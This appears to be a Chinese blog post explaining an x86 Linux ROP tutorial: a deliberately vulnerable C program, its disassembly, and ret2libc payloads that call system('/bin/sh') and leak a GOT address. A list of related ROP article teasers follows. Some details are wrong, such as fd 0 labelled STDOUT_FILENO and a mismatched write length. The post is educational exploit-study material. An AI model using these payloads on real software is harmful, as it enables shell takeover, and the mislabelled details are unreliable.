linux内核rop姿势详解,一步一步学ROP之linux_x86篇

最新推荐文章于 2024-08-12 22:28:28 发布
最新推荐文章于 2024-08-12 22:28:28 发布
阅读量175 收藏
点赞数
文章标签: linux内核rop姿势详解

0x00

本文仅解释说明蒸米大神一步一步学ROP之linux_x86篇,读者应先阅读这篇文章,遇到问题再来看我这篇文章。

阅读完这两篇文章后,我们会理解ROP(返回导向编程),DEP(堆栈不可执行),ASLR(内存地址随机化),Stack Protector(栈保护),Memory Leak。

0x01

第一个问题:为什么要构造成”A”*140+ret字符串,这个140是怎么来的呢?

要回答这个问题,我们需要把level1.c反汇编,level1.c代码如下:

#include

#include

#include

void vulnerable_function() {

char buf[128];

read(STDIN_FILENO, buf, 256);

}

int main(int argc, char** argv) {

vulnerable_function();

write(STDOUT_FILENO, "Hello, World\n", 13);

}    使用objdump -S level1反汇编,结果如下:

08048404 :

8048404: 55 push %ebp

8048405: 89 e5 mov %esp,%ebp

8048407: 81 ec 98 00 00 00 sub $0x98,%esp //esp-0x98

804840d: c7 44 24 08 00 01 00 movl $0x100,0x8(%esp)//存放第三个参数256

8048414: 00

8048415: 8d 85 78 ff ff ff lea -0x88(%ebp),%eax//存放第二个参数,buf的地址

804841b: 89 44 24 04 mov %eax,0x4(%esp)

804841f: c7 04 24 00 00 00 00 movl $0x0,(%esp)//存放第一个参数,STDOUT_FILENO

8048426: e8 e5 fe ff ff call 8048310

804842b: c9 leave

804842c: c3 ret

0804842d :

804842d: 55 push %ebp

804842e: 89 e5 mov %esp,%ebp

8048430: 83 e4 f0 and $0xfffffff0,%esp

8048433: 83 ec 10 sub $0x10,%esp

8048436: e8 c9 ff ff ff call 8048404

804843b: c7 44 24 08 0d 00 00 movl $0xd,0x8(%esp)

8048442: 00

8048443: c7 44 24 04 30 85 04 movl $0x8048530,0x4(%esp)

804844a: 08

804844b: c7 04 24 01 00 00 00 movl $0x1,(%esp)

8048452: e8 e9 fe ff ff call 8048340

8048457: c9 leave

8048458: c3 ret

8048459: 90 nop

804845a: 90 nop

804845b: 90 nop

804845c: 90 nop

804845d: 90 nop

804845e: 90 nop

804845f: 90 nop    当main函数调用call 8048404 ,参考上面的代码注释,就形成了下图结构:

A114040153-204311.png_small.png

0x02

payload = 'A'*140 + p32(systemaddr) + p32(ret) + p32(binshaddr)这段代码是为了执行system("/bin/sh"),然后返回到ret继续执行。也就是binshaddr是system的参数,那么为什么这些写可以呢?

我们先来看8048426: e8 e5 fe ff ff call 8048310 是怎么样取参数的?

A114042903-204311.png_small.png

调用read后,依次向堆栈中存储了EIP和EBP,此时如果想取第一个参数,需要用ESP-8。

同理我们就可以理解 payload = 'A'*140 + p32(systemaddr) + p32(ret) + p32(binshaddr)这句代码的含义,如下图,观察右边的小图:

A114045872-204311.png_small.png

这样我们就能理解为什么/bin/sh是第一个参数,为什么system("/bin/sh")执行后返回到ret了。

0x03

payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4)这句话执行的函数是?

write(STDOUT_FILENO, got_write, 3);

0x04

在一步一步学ROP之linux_x64篇一文中,讲到了Memory Leak,这段代码的含义是什么呢?

payload2 = 'a'*140 + p32(plt_read) + p32(pppr) + p32(0) + p32(bss_addr) + p32(8) payload2 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr)    从标准输入读取/bin/sh到.bss段,对应的代码read(STDIN_FILENO, bss_addr, 8)。

然后返回到pppt,执行pop pop pop ret,也就是绕过p32(0) + p32(bss_addr) + p32(8),执行system_addr,之后的流程就和原来一致了。

何少言
关注
[网络安全自] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一文章,希望能够帮助到您!
CFI/CFG 安全防护原理详解(ROP攻击、DOP攻击、插装检测)
墨痕诉清风的博客
12-13 3403
1. 简介 CFI: Control-Flow Integrity(控制流完整性) CFG: Control Flow Guard(Windows的CFI实现) CFG: Control-Flow Graph(控制流图) LTO: Link Time Optimization(链接时优化) 1.1 控制流攻击历史 控制流劫持是一种危害性极大的攻击方式,攻击者能够通过它来获取目标机器的控制权,甚至进行提权操作,对目标机器进行全面控制。当攻击者掌握了被攻击程序的内存错误漏洞后,一般会考虑发起控制流劫持
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7585
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
Linux内核ROP姿势详解(二)
weixin_30664615的博客
02-22 366
   /* 很棒的文章,在freebuf上发现了这文章上部分的翻译,但作者貌似弃坑了,顺手把下半部分也翻译了,原文见文尾链接 --by JDchen */ 介绍 在文章第一部分,我们演示了如何找到有用的ROP gadge...
ROP和Ret2libc漏洞
最新发布
qq_67812668的博客
08-12 937
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
linux内核rop姿势详解,[原创]rop链攻击原理与思路(x86/x64)
weixin_42397925的博客
05-02 864
rop链的基础原理rop是Return Oriented Programming(面向返回的编程)的缩写;根据函数调用规则,当刚跳转到其它函数去执行时,从被调用者的视角看:栈顶是返回地址,紧接着是自己的参数(X86架构下);然后,被调用者会对栈空间进行一系列操作,保存寄存器和存储临时变量,但在即将退出时会清理自己消耗的栈空间,以使其回到自己被调用前的栈空间,保持栈平衡;最后,被调用者以ret指令结...
一步一步ROPlinux_x64
HiTaQini
11-20 1760
0x00 序ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。
ROP的基本原理和实战教,看这一就够了
QL_2023的博客
02-21 2187
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
[网络安全自] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解(1)
热门推荐
杨秀璋的专栏
06-19 1万+
从这文章开始,作者将带着大家来习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第一文章主要包括两部分内容,开发环境(VS、编译设置)、基础技术、运行单一实例(互斥对象示例)、DLL延迟加载(skin++换皮肤示例)、资源释放(MFC示例)。希望对您有所帮助~
计算机系统:Return Oriented Programming(ROP详解——颠覆传统的攻击方式
m0_72410588的博客
08-31 974
在计算机领域,随着技术的不断发展,攻击者也在探索新的方式来突破系统的安全防线。其中一种被广泛讨论的攻击方式就是"Return Oriented Programming"(ROP,返回导向编程)。本文将深入探讨ROP的原理、应用以及对计算机系统安全的影响。
基本ROP讲解
zz_strive_2012的专栏
06-23 422
https://baijiahao.baidu.com/s?id=1665277270769279870&wfr=spider&for=pc
linuxrop的利用
NoOneGroup
11-25 415
博客已经转移 https://noone-hub.github.io/ 等我复现完最近几道比较难的rop后再来写总结,最近没时间写
x86 架构中的内存攻击技术 ROP(一)
个人笔记
04-05 2034
返回导向编程(Return-Oriented Programming,ROP)是一种高级的内存攻击技术,主要是为了绕过操作系统的防御手段 NX。该技术往往利用一些已有的漏洞,特别是缓冲区溢出,攻击者控制堆栈调用以劫持程序控制流并执行针对性的机器语言指令序列(gadgets),这些 gadget 组合,就能成功执行我们自己的逻辑。
x86 架构中的内存攻击技术 ROP(二)
个人笔记
04-12 940
ROP 返回导向编程作为一种高级的内存攻击技术,可以让代码执行程序中已有二进制代码片段,将若干指令拼接在一起,形成 ROP 链。上一章讲述了其一般用法,本次继续讲述 ROP emporium 剩余的题目。
linux内核rop姿势详解,Linux内核ROP姿势详解(二)
weixin_39983350的博客
05-02 459
前言在本教程的第1部分中,我们已经演示了如何为我们的系统(3.13.0-32内核-Ubuntu 12.04.5 LTS)找到有用的ROP gadgets用来构建一个用来提权的ROP链。我们还开发了一个易受攻击的内核驱动程序,允许任意代码执行。这部分我们将使用这个内核模块在实践中演示ROP链:提权,修复系统并干净地“退出”到用户态。以下是第1部分的ROP链的要求:执行提权的payload可以引用驻留...
linux编写rop总结
inquisiter
02-21 569
攻击方式这个好像是比较核心的一种利用方式,主要分两种 1覆盖虚表指针 采用了虚函数表修改的uaf利用法则。 找到释放没有清零的指针。(这里释放的对象必须是有虚函数的) 从新分配占用之前释放的结构。(对象释放掉后,把虚函数表中的函数修改掉)(直接修改内存显然会引发地址禁止写异常) 调用引用原结构的函数触发自己构造的调用函数。(调用虚函数被替换,本来释放的对象,应为没用清空指针,导致再次利用成功)。
linux内核rop姿势详解,linux kernel rop
weixin_36163672的博客
05-02 506
Introduction习 liunx 内核漏洞利用 rop 技术,练习一下内核 rop 链的构造到执行来完成普通用户权限提升。在一般的 ret2usr 攻击中,内核的控制流会被重定向到用户空间中包含权限提升代码的地址处:void __attribute__((regparm(3))) payload() {commit_creds(prepare_kernel_cred(0);}执行上面的代码...
ROP攻击技术详解:利用内存指令链的Linux漏洞利用方法
ROP(Return-Oriented Programming)是一种在计算机程序中利用系统调用和已存在于内存中的指令序列来执行恶意代码的技术。它针对的操作系统特性是W^X(Write-What-Where),即栈上执行(Stack executability)被禁用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值